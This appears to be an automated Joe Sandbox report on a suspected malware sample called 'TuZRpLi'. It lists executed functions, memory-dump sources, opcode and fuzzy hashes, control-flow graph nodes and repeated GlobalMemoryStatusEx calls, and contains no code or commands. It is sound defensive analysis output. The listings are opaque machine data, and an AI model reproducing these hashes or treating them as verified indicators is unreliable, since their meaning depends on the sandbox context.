                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d26cebe0ea97eee3264dbe8b5e1530df455b94187254a0b9acef50b87be0218a
                                              • Instruction ID: b991ef12998c4ed524f9199a0eb0dbf4206695d10ed315f9f1a0a0b5216e17ed
                                              • Opcode Fuzzy Hash: d26cebe0ea97eee3264dbe8b5e1530df455b94187254a0b9acef50b87be0218a
                                              • Instruction Fuzzy Hash: A02191755483809FD703CF64D990715BFB5FB86214F18C5DAD8858B2A3C33A981ADB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0103D294 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2045134352.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_103d000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 585450631962347cb96df88da6401f6597e5f661ef20c8ffcaf733fdb80483b8
                                              • Instruction ID: 5bc7c9ef045535043ce9e4adea59ce45fe21d4c6fc41da794a7ab5b661f0c07e
                                              • Opcode Fuzzy Hash: 585450631962347cb96df88da6401f6597e5f661ef20c8ffcaf733fdb80483b8
                                              • Instruction Fuzzy Hash: B8210775504204EFDB05DFA8D5C0B2ABFA9FBC4314F64C5ADD9894B252C33AD806CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0103D0DC Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2045134352.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_103d000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5cdcfb2c12eca588c2af06ba88fcaea006dcb1d51497c334a867411881be11d8
                                              • Instruction ID: f5d68367e8bfc4d2feac9f42fc874816d48e76ef1a06868394afa2143b55e7db
                                              • Opcode Fuzzy Hash: 5cdcfb2c12eca588c2af06ba88fcaea006dcb1d51497c334a867411881be11d8
                                              • Instruction Fuzzy Hash: CB21F571504204EFDB05DF58D980B16BBA9FBC4314F60C5ADE9494B356C33AD446CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0102D63B Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2045042905.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_102d000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                              • Instruction ID: d40dc84860309254ea630b822a3e6e1c616d539e236ca6c317d0adb44bd74afa
                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                              • Instruction Fuzzy Hash: C0110376404280CFCB12CF44D5C4B16BFB2FB88310F24C6A9D9490B657C33AD85ACBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0103D28F Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2045134352.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_103d000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: d4cb1c202440770787368fac336243d491c45d12cac470de4e05674b151e654a
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: A2119D75504280DFDB06CF54D5C4B15BFB1FB84314F24C6A9D9894B657C33AD84ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:11.7%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:29
                                              Total number of Limit Nodes:6
                                              execution_graph 28894 1050848 28896 105084e 28894->28896 28895 105091b 28896->28895 28899 1051490 28896->28899 28905 1051382 28896->28905 28901 1051396 28899->28901 28902 1051497 28899->28902 28900 1051488 28900->28896 28901->28900 28904 1051490 3 API calls 28901->28904 28911 1057098 28901->28911 28902->28896 28904->28901 28906 10512e6 28905->28906 28908 105138b 28905->28908 28906->28896 28907 1051488 28907->28896 28908->28907 28909 1051490 3 API calls 28908->28909 28910 1057098 3 API calls 28908->28910 28909->28908 28910->28908 28912 10570a2 28911->28912 28913 10570bc 28912->28913 28916 5f2cf77 28912->28916 28922 5f2cf88 28912->28922 28913->28901 28917 5f2cf88 28916->28917 28918 5f2d1ae 28917->28918 28919 5f2d5d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28917->28919 28920 5f2d598 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28917->28920 28921 5f2d56c GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28917->28921 28918->28913 28919->28917 28920->28917 28921->28917 28923 5f2cf9d 28922->28923 28924 5f2d1ae 28923->28924 28925 5f2d5d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28923->28925 28926 5f2d598 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28923->28926 28927 5f2d56c GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28923->28927 28924->28913 28925->28923 28926->28923 28927->28923

                                              Executed Functions

                                              Function 01059BF8 Relevance: 3.0, Instructions: 3028COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 625f9860b33b3bcdc2be966c69d71ffb4e938ead247287ecc47b07297d85eca3
                                              • Instruction ID: f4229c6c3c6c96fcc05bc8ef077c910e68d885039b170882859d4873cdc79ce2
                                              • Opcode Fuzzy Hash: 625f9860b33b3bcdc2be966c69d71ffb4e938ead247287ecc47b07297d85eca3
                                              • Instruction Fuzzy Hash: 7A631C31D10B1A8ADB51EF68C8845AAF7B1FF99300F15C79AE45877121FB70AAD4CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0105CE88 Relevance: 2.3, Instructions: 2302COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ed30bf67f0529170ab077ba78642ebd8e21b678e63ee6075234e9d3c15310a4
                                              • Instruction ID: 64c0daa703f8fadb8145d2f78752510b644b072cf98adaa0a47699366fa71149
                                              • Opcode Fuzzy Hash: 9ed30bf67f0529170ab077ba78642ebd8e21b678e63ee6075234e9d3c15310a4
                                              • Instruction Fuzzy Hash: D3332F31D1071A8EDB51EF68C8946EEF7B1FF99300F15C69AE448A7211EB70AAC5CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01053E88 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V-j
                                              • API String ID: 0-1172565933
                                              • Opcode ID: e12c3a123ed55df81eb6687640b66a7580624734e4ba23ab751643b4f6dd495d
                                              • Instruction ID: dc350002f46ac25893f9bda8deccda9fc43efb64f3afb307165b3ed94c71880d
                                              • Opcode Fuzzy Hash: e12c3a123ed55df81eb6687640b66a7580624734e4ba23ab751643b4f6dd495d
                                              • Instruction Fuzzy Hash: A7914B70E002099FDF94CFA9C9857DEBBF2BF88314F148529E854EB254EB749885CB85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01059380 Relevance: .6, Instructions: 620COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f23552675761c186ea44f52be01e844aa388f3b36968cb4609f6aba1b1fb065
                                              • Instruction ID: 4bb035f4a679a1591eefa3db005c0d29ca1dafaded1241490a529353e29f84d1
                                              • Opcode Fuzzy Hash: 0f23552675761c186ea44f52be01e844aa388f3b36968cb4609f6aba1b1fb065
                                              • Instruction Fuzzy Hash: A1329F35A00205CFDB54DF68D584AAEBBF6EF88314F20846AE949DB395DB30DC45CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01054AA0 Relevance: .3, Instructions: 266COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d90b67a1d099527d988069dfc912cc807e5379fd723a314518803f8f59ba1a3b
                                              • Instruction ID: c4503239e35238b6914cb741a36ed559cb4b339c88b069a7aecb871c554cc04c
                                              • Opcode Fuzzy Hash: d90b67a1d099527d988069dfc912cc807e5379fd723a314518803f8f59ba1a3b
                                              • Instruction Fuzzy Hash: 83B16D70E00209CFDF94DFA9D9857DEBBF2AF88314F148129D859E7294EB749881CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01054818 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1933 1054818-10548a4 1936 10548a6-10548b1 1933->1936 1937 10548ee-10548f0 1933->1937 1936->1937 1938 10548b3-10548bf 1936->1938 1939 10548f2-105490a 1937->1939 1940 10548c1-10548cb 1938->1940 1941 10548e2-10548ec 1938->1941 1946 1054954-1054956 1939->1946 1947 105490c-1054917 1939->1947 1942 10548cd 1940->1942 1943 10548cf-10548de 1940->1943 1941->1939 1942->1943 1943->1943 1945 10548e0 1943->1945 1945->1941 1948 1054958-10549b1 1946->1948 1947->1946 1949 1054919-1054925 1947->1949 1958 10549b3-10549b9 1948->1958 1959 10549ba-10549da 1948->1959 1950 1054927-1054931 1949->1950 1951 1054948-1054952 1949->1951 1953 1054935-1054944 1950->1953 1954 1054933 1950->1954 1951->1948 1953->1953 1955 1054946 1953->1955 1954->1953 1955->1951 1958->1959 1963 10549e4-1054a17 1959->1963 1966 1054a27-1054a2b 1963->1966 1967 1054a19-1054a1d 1963->1967 1969 1054a2d-1054a31 1966->1969 1970 1054a3b-1054a3f 1966->1970 1967->1966 1968 1054a1f-1054a22 call 1050ab8 1967->1968 1968->1966 1969->1970 1972 1054a33-1054a36 call 1050ab8 1969->1972 1973 1054a41-1054a45 1970->1973 1974 1054a4f-1054a53 1970->1974 1972->1970 1973->1974 1978 1054a47 1973->1978 1975 1054a55-1054a59 1974->1975 1976 1054a63 1974->1976 1975->1976 1979 1054a5b 1975->1979 1980 1054a64 1976->1980 1978->1974 1979->1976 1980->1980
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V-j$\V-j
                                              • API String ID: 0-3066401176
                                              • Opcode ID: 63bf794efba1b68256a1e29c7b436c1ad9f648b1c04448fbb155cab66908a28a
                                              • Instruction ID: 31b3c51b1e8654ef5f33160e27b85ecd7415028abe7ac994ae67e5adacbf3560
                                              • Opcode Fuzzy Hash: 63bf794efba1b68256a1e29c7b436c1ad9f648b1c04448fbb155cab66908a28a
                                              • Instruction Fuzzy Hash: 45715D70E002499FDF94DFA9C8857EEBBF2AF88314F148129D854E7254EB749882CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0105480C Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1981 105480c-10548a4 1984 10548a6-10548b1 1981->1984 1985 10548ee-10548f0 1981->1985 1984->1985 1986 10548b3-10548bf 1984->1986 1987 10548f2-105490a 1985->1987 1988 10548c1-10548cb 1986->1988 1989 10548e2-10548ec 1986->1989 1994 1054954-1054956 1987->1994 1995 105490c-1054917 1987->1995 1990 10548cd 1988->1990 1991 10548cf-10548de 1988->1991 1989->1987 1990->1991 1991->1991 1993 10548e0 1991->1993 1993->1989 1996 1054958-105496a 1994->1996 1995->1994 1997 1054919-1054925 1995->1997 2004 1054971-105499d 1996->2004 1998 1054927-1054931 1997->1998 1999 1054948-1054952 1997->1999 2001 1054935-1054944 1998->2001 2002 1054933 1998->2002 1999->1996 2001->2001 2003 1054946 2001->2003 2002->2001 2003->1999 2005 10549a3-10549b1 2004->2005 2006 10549b3-10549b9 2005->2006 2007 10549ba-10549c8 2005->2007 2006->2007 2010 10549d0-10549da 2007->2010 2011 10549e4-1054a17 2010->2011 2014 1054a27-1054a2b 2011->2014 2015 1054a19-1054a1d 2011->2015 2017 1054a2d-1054a31 2014->2017 2018 1054a3b-1054a3f 2014->2018 2015->2014 2016 1054a1f-1054a22 call 1050ab8 2015->2016 2016->2014 2017->2018 2020 1054a33-1054a36 call 1050ab8 2017->2020 2021 1054a41-1054a45 2018->2021 2022 1054a4f-1054a53 2018->2022 2020->2018 2021->2022 2026 1054a47 2021->2026 2023 1054a55-1054a59 2022->2023 2024 1054a63 2022->2024 2023->2024 2027 1054a5b 2023->2027 2028 1054a64 2024->2028 2026->2022 2027->2024 2028->2028
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V-j$\V-j
                                              • API String ID: 0-3066401176
                                              • Opcode ID: 17b82732d82df5213906dac40882270efd6db5a14bb55e967e35ed2b81ef8fbf
                                              • Instruction ID: bd35d903a9afc05abc2dae5f8059167193782d08383bc158fd9716f5389af406
                                              • Opcode Fuzzy Hash: 17b82732d82df5213906dac40882270efd6db5a14bb55e967e35ed2b81ef8fbf
                                              • Instruction Fuzzy Hash: F1716CB0D002499FDF94DFA9C8817DEBBF1AF88314F148129E858E7254EB749882CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05F2E198 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2903 5f2e198-5f2e1a3 2904 5f2e1a5-5f2e1cc call 5f2d57c 2903->2904 2905 5f2e1cd-5f2e1ec call 5f2d588 2903->2905 2911 5f2e1f2-5f2e1f7 2905->2911 2912 5f2e1ee-5f2e1f1 2905->2912 2913 5f2e1fc-5f2e242 2911->2913 2918 5f2e244-5f2e251 2913->2918 2920 5f2e253-5f2e256 2918->2920 2921 5f2e257-5f2e2e4 GlobalMemoryStatusEx 2918->2921 2924 5f2e2e6-5f2e2ec 2921->2924 2925 5f2e2ed-5f2e315 2921->2925 2924->2925
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3267493749.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_5f20000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8e0703acc777e7420823b188215bacfca6a9a23aba0d05ba9a36c46a078360b
                                              • Instruction ID: cf983214b71a269b23f57a4180da66abb505999ab7d2f793ec8a782a30ef08aa
                                              • Opcode Fuzzy Hash: e8e0703acc777e7420823b188215bacfca6a9a23aba0d05ba9a36c46a078360b
                                              • Instruction Fuzzy Hash: E0411571D043A58FCB04CFB9D4142AABFF5EF89210F1485AAD508E7241DB789885CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05F2D588 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2928 5f2d588-5f2e2e4 GlobalMemoryStatusEx 2931 5f2e2e6-5f2e2ec 2928->2931 2932 5f2e2ed-5f2e315 2928->2932 2931->2932
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F2E1EA), ref: 05F2E2D7
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3267493749.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_5f20000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 28c7d8c40227fc865e82c464e88e337fbc8035408e368232798e03b85dd055fe
                                              • Instruction ID: 07530da1e4da84a58312e8b3cc77a3a98750dd12074d570448e3ee13ecc8951a
                                              • Opcode Fuzzy Hash: 28c7d8c40227fc865e82c464e88e337fbc8035408e368232798e03b85dd055fe
                                              • Instruction Fuzzy Hash: F71103B1C006699BCB10DF9AD544BAEFBF8EF49310F14816AE918B7240D378A954CFE5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05F2E268 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2935 5f2e268-5f2e2ae 2937 5f2e2b6-5f2e2e4 GlobalMemoryStatusEx 2935->2937 2938 5f2e2e6-5f2e2ec 2937->2938 2939 5f2e2ed-5f2e315 2937->2939 2938->2939
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F2E1EA), ref: 05F2E2D7
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3267493749.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_5f20000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 8c5954d0e835d7dbb4f2ba9c3cb3e7b91b935109788b5146f8319f1e53b222a5
                                              • Instruction ID: 4db9782925deb31d60365bd724339259def26b6d0cdcbaf8bd20b72f3e3fb2ec
                                              • Opcode Fuzzy Hash: 8c5954d0e835d7dbb4f2ba9c3cb3e7b91b935109788b5146f8319f1e53b222a5
                                              • Instruction Fuzzy Hash: 511103B1C006599BCB10DF9AC545BEEFBB8EF49310F14812AE518A7240D378A954CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01053E7D Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V-j
                                              • API String ID: 0-1172565933
                                              • Opcode ID: 64080108829026102782d3f29cd5d67af4f0008d2099b0562f9c2691e847bacb
                                              • Instruction ID: 9e27179196ff8c5609e21c780999b2007e77efe0102785ccf06540e312c6d404
                                              • Opcode Fuzzy Hash: 64080108829026102782d3f29cd5d67af4f0008d2099b0562f9c2691e847bacb
                                              • Instruction Fuzzy Hash: DCA14E70E00209DFDF90CFA9C9857DEBBF1AF48314F148529E894EB254EB749886CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0105F3C5 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: 6a8fee181c8bcf181cb3cfc70f99aec75f8440f643f730f5682c5b8c7ee8a315
                                              • Instruction ID: fbaca4a4ec7deaf2735575c2aebb766255e3847abc053c9e6bbeda0675290fc7
                                              • Opcode Fuzzy Hash: 6a8fee181c8bcf181cb3cfc70f99aec75f8440f643f730f5682c5b8c7ee8a315
                                              • Instruction Fuzzy Hash: B231C2307002028FDB969B78D55466F3BE2AF85200F1444A9E486DB389DE3DDC46CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0105F3D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: a323303a57dcdfa8219768ed2b0b972d1ccf07c8568dc124aeddc8b54697c3c4
                                              • Instruction ID: b8485d9c9906d1bf2afc69fa814df382b21eb4df68919a64390ecfbb988cf5c7
                                              • Opcode Fuzzy Hash: a323303a57dcdfa8219768ed2b0b972d1ccf07c8568dc124aeddc8b54697c3c4
                                              • Instruction Fuzzy Hash: 0F31D2307002028FDB95AB38D55466F3BE6EF85200F104478E886DB389DE39DD45CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01056F80 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LR]q
                                              • API String ID: 0-3081347316
                                              • Opcode ID: daa945366660f2fcfb6d2043cfde237bb495aaf557395bcfd7cc8f7f64c5d8d7
                                              • Instruction ID: f9da337fce2e45ccdbb2c381fe711cf20df39b72b6d10db59b9a9efa1713d744
                                              • Opcode Fuzzy Hash: daa945366660f2fcfb6d2043cfde237bb495aaf557395bcfd7cc8f7f64c5d8d7
                                              • Instruction Fuzzy Hash: 5B31AF34E10209CBDB95CFA8C45079FB7F2EF85300FA0856AF845EB241EB71A842CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01056F71 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LR]q
                                              • API String ID: 0-3081347316
                                              • Opcode ID: 9cfd0ed82850c1045660c81089a6001af721fd0bb813babfc75984da5a182ca9
                                              • Instruction ID: 88cc3a1a10d20ba30727d96b2ae0f6f4483015188be57a494ea8647be593410f
                                              • Opcode Fuzzy Hash: 9cfd0ed82850c1045660c81089a6001af721fd0bb813babfc75984da5a182ca9
                                              • Instruction Fuzzy Hash: A9318F34E10209CBDB95CF68C4547AFB7F2EF85304FA0896AF845EB241DBB198428B51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01051490 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D
                                              • API String ID: 0-2746444292
                                              • Opcode ID: 3066244007c3ff9c253e95b0f8ff0156bf8d70e7d0425d4d37b7678d28eed978
                                              • Instruction ID: 69d51c937f30427bf1e61135e45ad917915ac03c00b861354d1366e53a2fe5eb
                                              • Opcode Fuzzy Hash: 3066244007c3ff9c253e95b0f8ff0156bf8d70e7d0425d4d37b7678d28eed978
                                              • Instruction Fuzzy Hash: 3021DF71A002518FDFA2ABBC84403EF7BE0AB44314F1444B9ED85E7201EA35C842CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01057910 Relevance: .6, Instructions: 551COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ab5021cf2c60b1e35ae05087a37a570ed2934ccfc465688ff21b45904a2f78d
                                              • Instruction ID: 400459867f2ac4a7872bc7584f1bd153ad8d3d7d04214f5045639389d901abbb
                                              • Opcode Fuzzy Hash: 6ab5021cf2c60b1e35ae05087a37a570ed2934ccfc465688ff21b45904a2f78d
                                              • Instruction Fuzzy Hash: 7D1253347002018BCB59AB3CE49976D77AAEF89304F90993AE409CB396DF35DC46DB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01057920 Relevance: .6, Instructions: 550COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bbd09ce30d0a35ff2b7c07e93a226f112a9f0ea4ac3c15027f0f09ab6e649d14
                                              • Instruction ID: e622e91f6f0d44c26d86cee62f93f6f7b59c8fb6670335c5c96ede128a6883f7
                                              • Opcode Fuzzy Hash: bbd09ce30d0a35ff2b7c07e93a226f112a9f0ea4ac3c15027f0f09ab6e649d14
                                              • Instruction Fuzzy Hash: 531253347002018BCB59AB3CE49976D77AAEF89304F90993AE409CB396DF35DC46DB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01054A94 Relevance: .3, Instructions: 261COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 19c5801d1464f0a9b2f2bbbeaf0fe9d6c7188497ba0027e9509cfafb0256c89d
                                              • Instruction ID: 93bc35b549e0173b7100e89d96debf7b0497d26779237727c55e01801746e40f
                                              • Opcode Fuzzy Hash: 19c5801d1464f0a9b2f2bbbeaf0fe9d6c7188497ba0027e9509cfafb0256c89d
                                              • Instruction Fuzzy Hash: 90B17C70E00209CFDB90DFA9D9857DEBFF1AF88314F148169D859E7254EB749881CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0105936C Relevance: .2, Instructions: 238COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
